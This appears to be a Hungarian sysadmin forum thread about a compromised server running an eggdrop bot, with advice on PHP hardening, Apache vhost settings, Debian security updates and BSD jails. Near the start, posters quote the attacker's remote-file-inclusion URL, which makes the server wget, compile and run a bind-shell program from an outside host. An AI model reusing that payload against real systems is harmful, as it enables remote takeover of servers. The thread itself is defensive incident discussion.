Valaki eggdrop-ot futtat a szerveremen??!!!?

Még egy kis plussz biztonság. Ha nem kell másnak a wget, akkor csak a root használhassa.

mázli :wink:

ha hülye usereid vannak, akkor az a legbiztonságosabb, ha talpig begipszeled őket :wink:

[quote:f3ec3c9738="x15"]Probaljatok ki ezt a sort :D

http://www.a_te_szervered.hu/index.php?page=http://irc.t35.com/pong.php?&cmd=cd%20/tmp;wget%20http://ameer.port5.com/bindtty.c;gcc%20-o%20bindtty%20bindtty.c;chmod%20777%20bindtty;./bindtty

Nekem 404 :lol:

érdekes, nekem is :wink:

[quote:79803500f5="x15"][quote:79803500f5="snq-"][quote:79803500f5="andrej_"]Disabled Functions exec system

ennel azert tobbet is erdemes ide bevenni, nem?

Az a baj, hogy nem lehet per host allitani.
Az a gond, hogy ha sok mindent letiltunk, nem lehet dolgozni.

Mit kellene meg letiltani?

A php_admin_flag disable_functions "funkcio1, funkcio2 ...."
lehet virtual hostra is állítani, nem?

Lacika

[quote:801ec3ee56="lacika"]
A php_admin_flag disable_functions "funkcio1, funkcio2 ...."
lehet virtual hostra is állítani, nem?

Lacika

afaik nem

t

http://irc.t35.com/pong.php?&cmd=cd%20/tmp;wget%20http://ameer.port5.com/bindtty.c;gcc%20-o%20bindtty%20bindtty.c;chmod%20777%20bindtty;./bindtty
Illetve:
http://irc.t35.com/pong.php
8)

Bocs a tudatlanságomért, de miért nem egyből a binárist töltötte fel?
---
Ok, közben rájöttem, bizonyára a libek miatt.

nyilván, meg így ha jól van megírva a kód, akkor bármilyen rendszeren elfut (de legalábbis minden *nixen) :wink:

korrekt :)

es te vagy ott az admin?

hát ez tényleg szép :)
mint gondolom Te is látod, vmi rootkit került a gépedre.

én a helyedben megkeresném az eggdropot, megnézném hogy ki az ownerje, meglyik hálózat melyik csatornáira jár, aztán gép lehúz a hálóról, adatok lement, reinstall.

miközben megy a reinstall, bemehetsz eldumálgatni az IRC-re a sráccal mindenféle témákról ;)

PHP-hoz a kovetkezoek, virtual hostonkent:

Safe Mode On
Register Globals Off
Open Basedir /webrootok/user
Disabled Functions exec system

Weblaboron van egy cikk, hogy "PHP kicsit biztonsagosabban" vagy hasonlo, hamar megtalalod.

Ha sokaknak borul a cucca register globals miatt, akkor nyugodtan irj egy mailt, hogy "csokolom 2 eve default beallitas".

Szintem megoldas lehet, ha valami BSD (mondjuk FreeSBD-vel tuti mukodik) egy fullos jail -t hozol letre az apache -nak, es meg azon belul is felkerulnek a fenti tiltasok. :) Nalunk a kolleganak koszonhetoen hasonloan mukodik a dolog.

[quote:627b00ab16="andrej_"]Szintem megoldas lehet, ha valami BSD (mondjuk FreeSBD-vel tuti mukodik) egy fullos jail -t hozol letre az apache -nak, es meg azon belul is felkerulnek a fenti tiltasok. :) Nalunk a kolleganak koszonhetoen hasonloan mukodik a dolog.

igazán nem akarok vitát szítani de szerintem ezért felesleges BSD-t tenni.
megoldható linux-al is, szerintem (grsec meg a többi ami még kell)

a többivel teljes mértékig egyet értek, és kiegészíteném azzal hogy a usereknek shell acc-ot nem kellene adni, ezt csak azért írom mert ha rootkit-et nyomtak a gépre (ezt mondjuk gyorsan ki lehet deríteni) akkor valszeg local userrel történt a dolog legalábbis ezt tartom elképzelhetőnek...

persze várjuk meg amíg válaszol x15 úgy könnyebb lesz mint találgatni ;)

[quote:48cc4ec090="andrej_"]Disabled Functions exec system

ennel azert tobbet is erdemes ide bevenni, nem?

[quote:7602cc0f6a="x15"]Lehet valamit tenni?

sztem koszond meg, hogy nem vagta gajra az egesz rendszered + kerdezd meg, hogy konkretan mit ajanl a hasonlo esetek elkerulese erdekeben

[quote:1001de91e2="x15"]Az a baj, hogy nem lehet per host allitani.
Az a gond, hogy ha sok mindent letiltunk, nem lehet dolgozni.

Mit kellene meg letiltani?

Mindent amit nem hasznaltok :) Ha mindenbol annyi van csak amennyi kell es felesleges cuccok nincsenek maris sokkal jobban alsz.

azért az apache error logba került, mert az apache-val futtatták a wgetet, és emiatt a stdoutja az errorlogba megy. tehát biztosan valamilyen webes cucc a hibás. amúgy meg lehet hogy nem találtál rootkitet, de sosem lehetsz benne biztos mostantól, hogy valóban nincs ott :(

elemezd azokat amiket ő letöltött, nézd meg hogy mit hova pakolnak, és ott keresd. :wink:

[quote:c4062e7c0b="x15"][quote:c4062e7c0b="snq-"][quote:c4062e7c0b="andrej_"]Disabled Functions exec system

ennel azert tobbet is erdemes ide bevenni, nem?

Az a baj, hogy nem lehet per host allitani.
Az a gond, hogy ha sok mindent letiltunk, nem lehet dolgozni.

Mit kellene meg letiltani?

Surgosen beteszed a sources.list -be a Sid-et, upgrade-eled az apache-ot, a 2.0.50-5 vagy 2.0.50-7 verziok valamelyikere. Ismert biztonsagi res van a 2.0.49-ben (persze nem tudom azon jottek-e be).

[quote:116f7f8187="GCS"]Surgosen beteszed a sources.list -be a Sid-et, upgrade-eled az apache-ot, a 2.0.50-5 vagy 2.0.50-7 verziok valamelyikere. Ismert biztonsagi res van a 2.0.49-ben (persze nem tudom azon jottek-e be).

Bocs, ketto security is van benne. De az is lehet, hogy a PHP4-en jottek be, azt is upgrade-eld a Sid-bol (szinten security fixek).

[quote:5fff5f4366="x15"][quote:5fff5f4366="GCS"][quote:5fff5f4366="GCS"]Surgosen beteszed a sources.list -be a Sid-et, upgrade-eled az apache-ot, a 2.0.50-5 vagy 2.0.50-7 verziok valamelyikere. Ismert biztonsagi res van a 2.0.49-ben (persze nem tudom azon jottek-e be).

Bocs, ketto security is van benne. De az is lehet, hogy a PHP4-en jottek be, azt is upgrade-eld a Sid-bol (szinten security fixek).

Ezeket nem szoktak a sarge-ban kijavitani?
Nem szeretek sid-bol csomagokat telepiteni egy 24/365 szerverre, mert szopatott mar meg. (Lehetett vadaszni az elozo verziot...)

Tenyleg kezdek megbaratkozni a bsd gondolataval...

Namármost nemazé, de annak a pár szerverprogramnak ami fut a gépeden, igazán nem nagy ügy utána nézni, hogy most mi a rák van vele. Ha sechole-os, akkor azt az egy csomagot frissíted a sidből; amúgy is csak egy hónapot kell kibekkelni, aztán könnyebb lesz kicsinyt. (kopp-kopp)

Egyébként nem tűnik úgy, hogy az apacs két hibája okozta volna a bajod. Tényleg, az ssh-t hogy törték meg?

http://weblabor.hu/cikkek/phpbiztonsag

<VirtualHost 192.168.1.254>
ServerAdmin admin_email.cime
DocumentRoot /var/www/vhosts/url.hu/htdocs
ServerName url.hu
ErrorLog /var/www/vhost/url.hu/logs/error_log
TransferLog /var/www/vhost/url.hu/logs/access_log
php_admin_flag safe_mode On
php_admin_flag register_globals Off
php_admin_flag magic_quotes_gpc Off
php_admin_flag magic_quotes_runtime Off
php_admin_flag magic_quotes_sybase Off
php_admin_value doc_root "/var/www/vhosts/url.hu/htdocs/"
php_admin_value open_basedir "/var/www/vhosts/url.hu/"
php_admin_value upload_tmp_dir "/var/www/vhosts/url.hu/tmp/"
</VirtualHost>

Ime egy pelda es mukodik, igaz csak 2 gepen hasznaljuk, n+1 vhosttal. Ezenkivul meg mas is allithato.

Disabled functions: igy fejbol ez a ketto ugrott be, at kell nezni a fuggvenylistat, illetve eleve ami nem hasznaltatik az kimarad.

Grsec vs. BSD: a grsec + chroot is jo, viszont olyat meg nem csinaltam apache -al, igaz meg bsdvel sem eddig, de olllyat mar lattam mukodni.

BSD...
Portsbol felteszed forraskodbol ami kell, es up to date vagy, a sechole javitasok is jol bekerulnek. Gyakorlatilag a ports egy egeszen jo csomagkezelo rendszer, jonehany tool-al. A ports -ban altalaban tobb verziot is megtalalsz valamibol, pl apache 1 es 2 is van, aztan valaszthatsz. BSD mellett szol (egyelore), hogy a default linux exploitok kevesse mukodnek, illetve grsec szeru funkciok alapbol mukodnek. Egyebkent egy jol beallitott Linux+grsec es szinten jol beallitott FreeBSD biztonsaga kb. hasonlo lehet. A FreeBSD4 -ben megvalositott jail az gyakorlatilag olyan szintre hozhato, hogy onnan kifele csak TCP kapcsolat lehetseges, igy a tobbi szolgaltatas vagy a valodi gep is jol vedheto. Gazosabb beallitani, nehezkesebb adminisztralni ez teny, de valahogy mas feeling az elkulonitett processzterben mukodo usertevekenyseg. A tuzfal beallitasok viszont a valodi gepen vannak, es megteheto, hogy a jailbol nem engdunk a kulvilag fele semmit, csak a http portot mondjuk, illetve masik jailek fele a forgalmat. C fordito sem lesz a jailben, sem wget, ezekre ratesszuk az PHP beallitasokat es maris kaptunk valamit, amiben elegge problemas a bejaras.

Termeszetesen uberfeltorhetetlen csodagep nem letezik, de leteznek fokozatok es az elso, hogy a default script kiddie -k altal nyomott exploitok ne mukodjenek oly egyszeruen, a C fordito hianya es a tuzfalazas (csomagszures konkretan) pedig szinte kihuzza a szonyeget a labuk alol.

[quote:c97dd695aa="andrej_"]
BSD... [...]
Gazosabb beallitani, nehezkesebb adminisztralni ez teny

Azert ilyen kijelentesektol ovakodj. A teny az, hogy a meleg levego felfele szall, a hideg pedig lefele. :-) De egy rendszer adminisztracioja csak attol fugg, hogy ki mennyire ert hozza, mennyi ideje hasznalja. Szerinted trey is ugy gondolja, hogy nehezkesebb a FreeBSD-t adminolni? Nem hinnem... A jail + MAC pedig nagy üt.

[quote:edb426329e="LiRul"][quote:edb426329e="andrej_"]
BSD... [...]
Gazosabb beallitani, nehezkesebb adminisztralni ez teny

Azert ilyen kijelentesektol ovakodj. A teny az, hogy a meleg levego felfele szall, a hideg pedig lefele. :-) De egy rendszer adminisztracioja csak attol fugg, hogy ki mennyire ert hozza, mennyi ideje hasznalja. Szerinted trey is ugy gondolja, hogy nehezkesebb a FreeBSD-t adminolni? Nem hinnem... A jail + MAC pedig nagy üt.

A jail -es moccerrel osszerakott gepet macerasabb, mint egy debiant. Adminolok debiant is, es most 2 hetig volt szerencsem egy jail-es freebsdhez is, az itthoni "sima" freebsd utan. En speciel freebsd -n jobban otthonerzem magam, mar amennyire ez jo kifejezes, es tetszik a hangolhatosaga.

Csak abba gondolj bele, hogy egy apt-get install apache es egy cd /usr/ports/www/apache1 && make && make install && make clean kozott van egy kis kulonbseg. Ugye a forrasbol valo telepitgetesnel pedig nekunk kell parameterezni a make -et. Lehetne meg peldakat hozni, de ezaz egyik legszembeotlobb dolog.

A gazosabb rossz szo, a macerasabb es tobb odafigyelest igenylo lenne a jobb kifelyezes talan, de nem ezen kene lovagolni. 8)

[quote:8091d66acc="andrej_"]A jail -es moccerrel osszerakott gepet macerasabb, mint egy debiant.

Semmivel sem nehezebb mintha debianon hasznalsz chroot-okat. Sot, azoknal imho konnyebb.

[quote:8091d66acc="andrej_"]Csak abba gondolj bele, hogy egy apt-get install apache es egy cd /usr/ports/www/apache1 && make && make install && make clean kozott van egy kis kulonbseg.

Es amint nekem arra lenne szuksegem, hogy vmi speci (vagy nem is speci csak a maintainer altal nem fontosnak itelt) dolgot kell beletennem, maris oda az egesz elonye. Onnantol mindig sajat maganak kell apt-get source ... stb.

[quote:8091d66acc="andrej_"]A gazosabb rossz szo, a macerasabb es tobb odafigyelest igenylo lenne a jobb kifelyezes talan, de nem ezen kene lovagolni. 8)

Felveheted a napszemuveges smileyt, de a terminologia akkor is fontos. Amugy meg 'kifejezes' :-)

Gondolom most ugy tunik, hogy a freebsd mellett kardoskodok, egyelore bsd nekem hobbi, kenyeremet ,,debiannal'' keresem. Csak nem szeretnem, hogy egy ,,nehezebb adminolni'' kifejezes esetleg elriasszon masokat attol, hogy kiprobaljak ezt a rendszert is.

[quote:cea7ac7b4f="x15"]A freebsd pedig dual procira van kihegyezve, remelem beeri a hyper thread-el is.

Ezt nem tudom hol olvastad, de false.

[quote:9aba4e3730="x15"][quote:9aba4e3730="Aewyn"]
Egyébként nem tűnik úgy, hogy az apacs két hibája okozta volna a bajod. Tényleg, az ssh-t hogy törték meg?

Volt benne hiba.... A debianos gyerekeknek ezt sem sikerult honapokig kijavitani.

Nem remlik a honapokig valo keslekedes, talan a Sarge-ra gondolsz? Az lehet, hogy megvolt a javitas, de a Sarge-ba nem kerult at a Sid-bol. A Sarge stabil, remek es jol hasznalhato, de nincs hozza security support. Fontos, hogy Sarge szervernel kiserd nyomon a security bejelenteseket, es ahogy a Sid-ben megjelenik a javitas, porgesd at Sarge-ra, vagy egyszeruen szedd le a Sid csomagjat, es telepitsd.

[quote:9aba4e3730="x15"]Minden nap latok probalkozasokat brute-force-ra, ranezesre szotarbol. Ezek (szerintem) visszapattannak.

"Szerinted"?

[quote:9aba4e3730="x15"]Nem szeretem keverni a sid-et a sarge-al. Ki tudja mit okoznak a kulonfele, nem egymashoz forditott lib-ek.

1) Ezert vannak a fuggosegek,
2) Lehet, nem tudod, de a Sarge csomagjai a Sid-bol jonnek, ha teljesul harom feltetel: nincs ujabb verzio feltoltve a Sid-be, a fuggosegek mar bekerultek a Sarge-ba es a csomag tesztelesi ideje is lejart (10, 5 vagy ket nap).

[quote:9aba4e3730="x15"]Regebben nekem kellett forditani az apache+php parost.
Lehet, hogy megint ez lesz?

Ha megnagyobb security hibat akarsz elkovetni, akkor rajta.

[quote:9aba4e3730="x15"]A bsd azert tunik jobbnak, mert komoly emberek, megfontan, szervernek szanva dolgoznak rajta. A linux IMHO a desktop - multimedia iranyaba halad. (Nem is tudnek mast hasznalni.)

Van igazsag a szavaidban, de azert a Linux-ot nem huznam le ennyire. A Linux-on is odafigyelnek a biztonsagra, csak a disztribet es a security nyomonkoveteset vetetted el.

[quote:a6fd1cd0ee="x15"]Ezeket nem szoktak a sarge-ban kijavitani?

A Sid-ben javitjak, aztan a Sarge-ba atkerul amikor kerul.
Idezet http://lists.debian.org/debian-devel-announce/2004/08/msg00003.html :
12 August 2004
~180 RC bugs
testing-proposed-updates, testing-security working for all architectures
Official security support for sarge begins
^^^^^^^^^^^^^^^^^^^^^^^^^^^

"ok, jó a debian, csak legyen gyakrabban kiadás..." az a baj, hogy ez sokaknak gond. ha gyakrabban kell kiadás, akkor miért nem használsz más disztrót? máshol ezért kemény pénzeket kérnek el, pl. redhatéknál, ahol 5 évig nem frissülnek a csomagok minden kiadás után (RHEL, természetesen).